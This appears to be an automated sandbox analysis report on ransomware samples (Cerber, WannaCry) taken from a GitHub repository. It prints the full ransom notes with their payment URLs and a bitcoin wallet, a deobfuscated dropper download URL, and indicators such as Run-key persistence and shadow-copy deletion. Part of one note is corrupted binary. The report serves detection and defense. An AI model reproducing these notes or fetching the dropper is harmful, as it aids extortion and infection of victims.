cerber | hxxps://github[.]com/kh4sh3i/Ransomware-Samples

Resubmissions

03-07-2024 22:48

240703-2rckhs1hrh 6

03-07-2024 20:15

240703-y1lm1awcqk 10

Analysis

max time kernel
1200s
max time network
1207s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
03-07-2024 20:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/kh4sh3i/Ransomware-Samples

Score

10^/10

cerber wannacry defense_evasion discovery evasion execution impact miner persistence privilege_escalation ransomware worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://french-cooking.com/myguy.exe

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___K5YY_.hta

Family

cerber

Ransom Note

<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title>CERBER RANSOMWARE: Instructions</title> <HTA:APPLICATION APPLICATIONNAME="i5N" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize"> <style type="text/css"> a { color: #04a; text-decoration: none; } a:hover { text-decoration: underline; } body { background-color: #e7e7e7; color: #222; font-family: "Lucida Sans Unicode", "Lucida Grande", sans-serif; font-size: 13pt; line-height: 19pt; } body, h1 { margin: 0; padding: 0; } hr { color: #bda; height: 2pt; margin: 1.5%; } h1 { color: #555; font-size: 14pt; } ol { padding-left: 2.5%; } ol li { padding-bottom: 13pt; } small { color: #555; font-size: 11pt; } ul { list-style-type: none; margin: 0; padding: 0; } .button { color: #04a; cursor: pointer; } .button:hover { text-decoration: underline; } .container { background-color: #fff; border: 2pt solid #c7c7c7; margin: 5%; min-width: 850px; padding: 2.5%; } .header { border-bottom: 2pt solid #c7c7c7; margin-bottom: 2.5%; padding-bottom: 2.5%; } .h { display: none; } .hr { background: #bda; display: block; height: 2pt; margin-top: 1.5%; margin-bottom: 1.5%; overflow: hidden; width: 100%; } .info { background-color: #efe; border: 2pt solid #bda; display: inline-block; padding: 1.5%; text-align: center; } .updating { color: red; display: none; padding-left: 35px; background: url("data:image/gif;base64,R0lGODlhGQAZAKIEAMzMzJmZmTMzM2ZmZgAAAAAAAAAAAAAAACH/C05FVFNDQVBFMi4wAwEAAAAh+QQFAAAEACwAAAAAGQAZAAADVki63P4wSEiZvLXemRf4yhYoQ0l9aMiVLISCDms+L/DIwwnfc+c3qZ9g6Hn5hkhF7YgUKI2dpvNpExJ/WKquSoMCvd9geDeuBpcuGFrcQWep5Df7jU0AACH5BAUAAAQALAoAAQAOABQAAAMwSLDU/iu+Gdl0FbTAqeXg5YCdSJCBuZVqKw5wC8/qHJv2IN+uKvytn9AnFBCHx0cCACH5BAUAAAQALAoABAAOABQAAAMzSLoEzrC5F9Wk9YK6Jv8gEYzgaH4myaVBqYbfIINyHdcDI+wKniu7YG+2CPI4RgFI+EkAACH5BAUAAAQALAQACgAUAA4AAAMzSLrcBNDJBeuUNd6WwXbWtwnkFZwMqUpnu6il06IKLChDrsxBGufAHW0C1IlwxeMieEkAACH5BAUAAAQALAEACgAUAA4AAAM0SLLU/lAtFquctk6aIe5gGA1kBpwPqVZn66hl1KINPDRB3sxAGufAHc0C1IkIxcARZ4QkAAAh+QQFAAAEACwBAAQADgAUAAADMUhK0vurSfiko8oKHC//yyCCYvmVI4cOZAq+UCCDcv3VM4cHCuDHOZ/wI/xxigDQMAEAIfkEBQAABAAsAQABAA4AFAAAAzNIuizOkLgZ13xraHVF1puEKWBYlUP1pWrLBLALz+0cq3Yg324PAUAXcNgaBlVGgPAISQAAIfkEBQAABAAsAQABABQADgAAAzRIujzOMBJHpaXPksAVHoogMlzpZWK6lF2UjgobSK9AtjSs7QTg8xCfELgQ/og9I1IxXCYAADs=") left no-repeat; } #change_language { float: right; } #change_language, #texts div { display: none; } </style> </head> <body> <div class="container"> <div class="header"> <a id="change_language" href="#" onclick="return changeLanguage1();" title="English">☑ English</a> <h1>CERBER RANSOMWARE</h1> Instructions </div> <div id="languages"> ☑ Select your language <ul> <li><a href="#" title="English" onclick="return sh_bl('en');">English</a></li> <li><a href="#" title="Arabic" onclick="return sh_bl('ar');">العربية</a></li> <li><a href="#" title="Chinese" onclick="return sh_bl('zh');">中文</a></li> <li><a href="#" title="Dutch" onclick="return sh_bl('nl');">Nederlands</a></li> <li><a href="#" title="French" onclick="return sh_bl('fr');">Français</a></li> <li><a href="#" title="German" onclick="return sh_bl('de');">Deutsch</a></li> <li><a href="#" title="Italian" onclick="return sh_bl('it');">Italiano</a></li> <li><a href="#" title="Japanese" onclick="return sh_bl('ja');">日本語</a></li> <li><a href="#" title="Korean" onclick="return sh_bl('ko');">한국어</a></li> <li><a href="#" title="Polish" onclick="return sh_bl('pl');">Polski</a></li> <li><a href="#" title="Portuguese" onclick="return sh_bl('pt');">Português</a></li> <li><a href="#" title="Spanish" onclick="return sh_bl('es');">Español</a></li> <li><a href="#" title="Turkish" onclick="return sh_bl('tr');">Türkçe</a></li> </ul> </div> <div id="texts"> <div id="en"> Can't yoWI9pcEu find the necessary files? Is the c4zWPu5content of your files not readable? It is normal beBDuULcause the files' names and the data in your files have been encrypv6wgDPted by "Ce3CZVSaooIurber Ransomware". It mewhllc0fdzans your files are NOT damageT9mQqgVUAWd! Your files are modified only. This modification is reversible. FJbOfrom now it is not possa5TwUWKhsible to use your files until they will be decrypted. The only way to decEbaELc9KMrypt your files safely is to buy the special decryption software "CHQ8OCocerber Decryptor". Any attempts to restEOFSrgYioUore your files with the thirszxd-party software will be fatal for your files! <hr> You can procH4fE3jBXeed with purchasing of the decryption softwbQK5WzjXqare at your personal page: PleBpa2OeRase wait...<a class="url" href="http://p27dokhpz2n7nvgr.12hygy.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.12hygy.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.14ewqv.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.14ewqv.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.14vvrc.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.14vvrc.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.129p1t.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.129p1t.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.1apgrn.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.1apgrn.top/0370-6B13-9551-0446-9B5C</a> If tc7CSHSyChis page cannot be opened  cliT6ck here  to get a new addrEBXUkBGess of your personal page. If the addreoPVHaLBvss of your personal page is the same as befoED2z5Hzjzre after you tried to get a new one, you capgman try to get a new address in one hour. At thvqo6zg7z8is page you will receive the complete instr4QZFHXipMuctions how to buy the decryptiXxzGYLkon software for restoring all your files. Also at this page you will be able to reskDBVWUvTX7tore any one file for free to be sure "CerbeCVTsNj3r Decryptor" will help you. <hr> If your perhPfJMSltsonal page is not availaB5U7Pble for a long period there is another way to open your personal page - instacbeHPiMzKQllation and use of Tor Browser: <ol> <li>run your InteLJrnet browser (if you do not know what it is run the Internet Explorer);</li> <li>entF1er or copy the address <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> into the address bar of your browser and press ENTER;</li> <li>wait for the site loadCCbcva1ding;</li> <li>on the site you will be offered to doU0wnload Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;</li> <li>ruqTT3MC2n Tor Browser;</li> <li>connect with the butttxSygSon "Connect" (if you use the English version);</li> <li>a normal Internet broK9wser window will be opened after the initialization;</li> <li>type or copy the addEsress http://p27dokhpz2n7nvgr.onion/0370-6B13-9551-0446-9B5C in this browser address bar;</li> <li>preUjVluss ENTER;</li> <li>the site shoRtHJ3euld be loaded; if for some reason the site is not lojuading wait for a moment and try again.</li> </ol> If you have any prq3HJRJ1nqoblems during installation or use of Tor Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc11NbsaoeZnh bar "Install Tor Browser Windows" and you will find a lot of training videos about Tor Browser installation and use. <hr> AdditUmbwbuTEMXional information: You will fiV8cziUDsQnd the instruKmRvSmRWctions ("*_READ_THIS_FILE_*.hta") for ren8d4storing your files in any fZMQolder with your enc4bJnrypted files. The instrEgllKuctions "*_READ_THIS_FILE_*.hta" in the fNIolderV43XslNCzs with your encryAbNikpted files are not viroPwbRuses! The instrucOJZywt4tions "*_READ_THIS_FILE_*.hta" will he3lp you to decW3ccE9VJ6rypt your files. Remembecy3r! The worst sikKijjM9Ozituation already happY0RR8pikened and now the future of your files deIpends on your determri86fTxnnination and speed of your actions. </div> <div id="ar" style="direction: rtl;"> لا يمكنك العثور على الملفات الضرورية؟ هل محتوى الملفات غير قابل للقراءة؟ هذا أمر طبيعي لأن أسماء الملفات والبيانات في الملفات قد تم تشفيرها بواسطة "Cerber Ransomware". وهذا يعني أن الملفات الخاصة بك ليست تالفة! فقد تم تعديل ملفاتك فقط. ويمكن التراجع عن هذا. ومن الآن فإنه لا يكن استخدام الملفات الخاصة بك حتى يتم فك تشفيرها. الطريقة الوحيدة لفك تشفير ملفاتك بأمان هو أن تشتري برنامج فك التشفير المتخصص "Cerber Decryptor". إن أية محاولات لاستعادة الملفات الخاصة بك بواسطة برامج من طرف ثالث سوف تكون مدمرة لملفاتك! <hr> يمكنك الشروع في شراء برنامج فك التشفير من صفحتك الشخصية: أرجو الإنتظار...<a class="url" href="http://p27dokhpz2n7nvgr.12hygy.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.12hygy.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.14ewqv.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.14ewqv.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.14vvrc.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.14vvrc.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.129p1t.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.129p1t.top/0370-6B13-9551-0446-9B5C</a><hr><a href="http://p27dokhpz2n7nvgr.1apgrn.top/0370-6B13-9551-0446-9B5C" target="_blank">http://p27dokhpz2n7nvgr.1apgrn.top/0370-6B13-9551-0446-9B5C</a> في حالة تعذر فتح هذه الصفحة  انقر هنا  لإنشاء عنوان جديد لصفحتك الشخصية. في هذه الصفحة سوف تتلقى تعليمات كاملة حول كيفية شراء برنامج فك التشفير لاستعادة جميع الملفات الخاصة بك. في هذه الصفحة أيضًا سوف تتمكن من استعادة ملف واحد بشكل مجاني للتأكد من أن "Cerber Decryptor" سوف يساعدك. <hr> إذا كانت صفحتك الشخصية غير متاحة لفترة طويلة فإن ثمّة طريقة أخرى لفتح صفحتك الشخصية - تحميل واستخدام متصفح Tor: <ol> <li>قم بتشغيل متصفح الإنترنت الخاص بك (إذا كنت لا تعرف ما هو قم بتشغيل إنترنت إكسبلورر);</li> <li>قم بكتابة أو نسخ العنوان <a href="https://www.torproject.org/download/download-easy.html.en" target="_blank">https://www.torproject.org/download/download-easy.html.en</a> إلى شريط العنوان في المستعرض الخاص بك ثم اضغط ENTER;</li> <li>انتظر لتحميل الموقع;</li> <li>سوف يعرض عليك الموقع تحميل متصفح Tor. قم بتحميله وتشغيله، واتبع تعليمات التثبيت، وانتظر حتى اكتمال التثبيت;</li> <li>قم بتشغيل متصفح Tor;</li> <li>اضغط على الزر "Connect" (إذا كنت تستخدم النسخة الإنجليزية);</li> <li>سوف تُفتح نافذة متصفح الإنترنت العادي بعد البدء;</li> <li>قم بكتابة أو نسخ العنوان http://p27dokhpz2n7nvgr.onion/0370-6B13-9551-0446-9B5C في شريط العنوان في المتصفح;</li> <li>اضغط ENTER;</li> <li>يجب أن يتم تحميل الموقع؛ إذا لم يتم تحميل الموقع لأي سبب، انتظر للحظة وحاول مرة أخرى.</li> </ol> إذا كان لديك أية مشكلات أثناء عملية التثبيت أو استخدام متصفح Tor، يُرجى زيارة <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> واكتب الطلب "install tor browser windows" أو "تثبيت نوافذ متصفح Tor" في شريط البحث، وسوف تجد الكثير من أشرطة الفيديو للتدريب حول تثبيت متصفح Tor واستخدامه. <hr> معلومات إض4AH3xqافية: سboوف تجد إرشادات استعادة الملفات الخاصة بك ("*_READ_THIS_FILE_*") في أي مجلد مع ملفاتك المشفرة. الإرشgادات ("*_READ_THIS_FILE_*") الموجودة في المجلدات مع ملفاتك المشفرة ليست فيروسات والإرشادات ("*_READ_THIS_FILE_*") سوف تساعدك على فك تشفير الملفات الخاصة بك. تذكر أن أسوأ موNlt8noHقف قد حدث بالفعل، والآن مستقبل ملفاتك يعتمد على عزيمتك وسرعة الإجراءات الخاصة بك. </div> <div id="zh"> 您找不到所需的文件？ 您文件的内容无法阅读？ 这是正常的，因为您文件的文件名和数据已经被“Cerber Ransomware”加密了。 这意味着您的文件并�

Extracted

Path

C:\Users\Admin\AppData\Roaming\Microsoft\OneNote\16.0\_R_E_A_D___T_H_I_S___NEI2NG_.txt

Family

cerber

Ransom Note

CERBER RANSOMWARE ----- YOUR DOCUMENTS, PH0TOS, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ----- The only way to decrypt y0ur files is to receive the private key and decryption program. To receive the private key and decryption program go to any decrypted folder, inside there is the special file (*_READ_THIS_FILE_*) with complete instructions how to decrypt your files. If you cannot find any (*_READ_THIS_FILE_*) file at your PC, follow the instructions below: ----- 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://p27dokhpz2n7nvgr.onion/0370-6B13-9551-0446-9B5C Note! This page is available via "Tor Browser" only. ----- Also you can use temporary addresses on your personal page without using "Tor Browser". ----- 1. http://p27dokhpz2n7nvgr.12hygy.top/0370-6B13-9551-0446-9B5C 2. http://p27dokhpz2n7nvgr.14ewqv.top/0370-6B13-9551-0446-9B5C 3. http://p27dokhpz2n7nvgr.14vvrc.top/0370-6B13-9551-0446-9B5C 4. http://p27dokhpz2n7nvgr.129p1t.top/0370-6B13-9551-0446-9B5C 5. http://p27dokhpz2n7nvgr.1apgrn.top/0370-6B13-9551-0446-9B5C ----- Note! These are temporary addresses! They will be available for a limited amount of time! -----

URLs

http://p27dokhpz2n7nvgr.onion/0370-6B13-9551-0446-9B5C

http://p27dokhpz2n7nvgr.12hygy.top/0370-6B13-9551-0446-9B5C

http://p27dokhpz2n7nvgr.14ewqv.top/0370-6B13-9551-0446-9B5C

http://p27dokhpz2n7nvgr.14vvrc.top/0370-6B13-9551-0446-9B5C

http://p27dokhpz2n7nvgr.129p1t.top/0370-6B13-9551-0446-9B5C

http://p27dokhpz2n7nvgr.1apgrn.top/0370-6B13-9551-0446-9B5C

Extracted

Path

C:\Users\Admin\Documents\_R_E_A_D___T_H_I_S___6R04X67Z_.txt

Family

cerber

Ransom Note

CERBER RANSOMWARE ----- YOUR DOCUMENTS, PH0TOS, DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ----- The only way to decrypt y0ur files is to receive the private key and decryption program. To receive the private key and decryption program go to any decrypted folder, inside there is the specia��콪N5�&�])%�g䧴e�K ,��nu�d�4�G<Ķm�Q��nNx�R*WI��n�q��Vq��΀�on��c�9Uc��k�8J`'��֣�?��̧�UO`&-��:��?�\YE/�cA+�ދL�MfLX}��7x�~��lQ&�̅�K��m�edy�Vt~㣙~fe��k�Xp4ӂ�F�ze�>:{��w��l��஀Y( W��q2!BLGP?�O~��B��r�L��ս�Iagl��oR��"��h�iԘ��00[l:�xXC.�:��өG�4g�}>̎1�gM�폝�0#&� }a��H�D ��`��|]Ѯ'��ಉo}�d��h��\�)�� B�Za?�O��T��+��-ߊg�ī*�?�BZM(�r�5y��g��[��P��*�5ޔ�� 3��?��Dω�D�R!C�H��{i��y�J�Z�,��㪷�}J�iҳ_�Q/�P��2f,�� I��KQ9��O��F��2d�4�,�o �S�F��Y2o�n?��>�J~�o��}��:t-��HK�a��%�} �^� `�,mji��fD�"�?�E^�te�7�ނc��C�*s`g�Q\�I2��?HȽR�7��C�؜՝D.Ɵj��5Q�dd�0�H��G;��ߐv�z��n�h�' � ��#��s��$�@�,,0`��2ɚb�7t�̪�7��'��c��2L>�#��=g��l�rf\�t�,�I�=/��M�vuSW��G%-�q�ñ�N��=��z�E��~U�fA?��'�U�2��0�S�{H��=N5�4�?�=��Ի>ݛŒ��ʙ}�D-��Zx��?A�_��G13�x4�`�=ֱSZ;l��"��v�e��I��M7��p��p#V%Ê��-�XS5

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Signatures

Cerber
Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.
ransomware cerber
Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3338	4892	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4892	powershell.exe

Contacts a large (1157) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3480	netsh.exe
1960	netsh.exe

Cryptocurrency Miner
Makes network request to known mining pool URL.
miner

Drops startup file 5 IoCs

description	ioc	Process
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\word\startup\	cerber.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD6D43.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD6D5A.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rTErod.url	Ransomware.Unnamed_0.exe

Executes dropped EXE 64 IoCs

pid	Process
3856	taskdl.exe
2548	@[email protected]
848	@[email protected]
5028	taskhsvc.exe
4804	@[email protected]
2568	taskse.exe
1428	taskdl.exe
2860	taskdl.exe
3808	taskse.exe
1200	@[email protected]
428	taskse.exe
4452	@[email protected]
4884	taskdl.exe
3856	taskse.exe
3976	@[email protected]
4288	taskdl.exe
4192	taskse.exe
4184	@[email protected]
4992	taskdl.exe
4404	taskse.exe
4452	@[email protected]
2924	taskdl.exe
948	taskse.exe
4924	@[email protected]
4724	taskdl.exe
1288	taskse.exe
1772	@[email protected]
2788	taskdl.exe
4940	taskse.exe
412	@[email protected]
4520	taskdl.exe
4156	@[email protected]
600	taskse.exe
5036	taskdl.exe
2316	@[email protected]
96	taskse.exe
1176	taskdl.exe
2672	taskse.exe
3488	@[email protected]
1324	taskdl.exe
4988	taskse.exe
4688	@[email protected]
4208	taskdl.exe
2716	taskse.exe
1056	@[email protected]
3960	taskdl.exe
4624	taskse.exe
1976	@[email protected]
2908	taskdl.exe
2520	taskse.exe
4724	@[email protected]
4584	taskdl.exe
4088	taskse.exe
4640	@[email protected]
3300	taskdl.exe
1392	taskse.exe
1428	@[email protected]
1236	taskdl.exe
1008	taskse.exe
3768	@[email protected]
4736	taskdl.exe
3488	taskse.exe
5056	@[email protected]
2136	taskdl.exe

Loads dropped DLL 9 IoCs

pid	Process
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe
5028	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1960	icacls.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\wbaseltcdk426 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_Ransomware.WannaCry.zip\\tasksche.exe\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Run\waLPMrixgj = "\"C:\\Users\\Admin\\AppData\\Local\\JESYXQ~1\\DHSDHC~1.EXE\""	vbc.exe

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File created	C:\Windows\assembly\Desktop.ini	svchost.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	svchost.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
21	raw.githubusercontent.com
22	raw.githubusercontent.com

Drops file in System32 directory 38 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\documents	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat!	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\desktop	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam	cerber.exe
File opened for modification	\??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat!	cerber.exe

Sets desktop wallpaper using registry 2 TTPs 3 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp490C.bmp"	cerber.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4736 set thread context of 196	4736	Ransomware.Unnamed_0.exe	211
PID 3496 set thread context of 1016	3496	mshta.exe	212
PID 3496 set thread context of 68	3496	mshta.exe	239

Drops file in Program Files directory 20 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files\	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft\microsoft sql server	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft\powerpoint	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft\word	cerber.exe
File opened for modification	\??\c:\program files (x86)\onenote	cerber.exe
File opened for modification	\??\c:\program files (x86)\steam	cerber.exe
File opened for modification	\??\c:\program files (x86)\	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft\office	cerber.exe
File opened for modification	\??\c:\program files (x86)\powerpoint	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft sql server	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft\excel	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft\onenote	cerber.exe
File opened for modification	\??\c:\program files (x86)\outlook	cerber.exe
File opened for modification	\??\c:\program files (x86)\word	cerber.exe
File opened for modification	\??\c:\program files (x86)\bitcoin	cerber.exe
File opened for modification	\??\c:\program files (x86)\excel	cerber.exe
File opened for modification	\??\c:\program files (x86)\microsoft\outlook	cerber.exe
File opened for modification	\??\c:\program files (x86)\office	cerber.exe
File opened for modification	\??\c:\program files (x86)\the bat!	cerber.exe
File opened for modification	\??\c:\program files (x86)\thunderbird	cerber.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\steam	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\local\office	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\steam	cerber.exe
File opened for modification	\??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook	cerber.exe
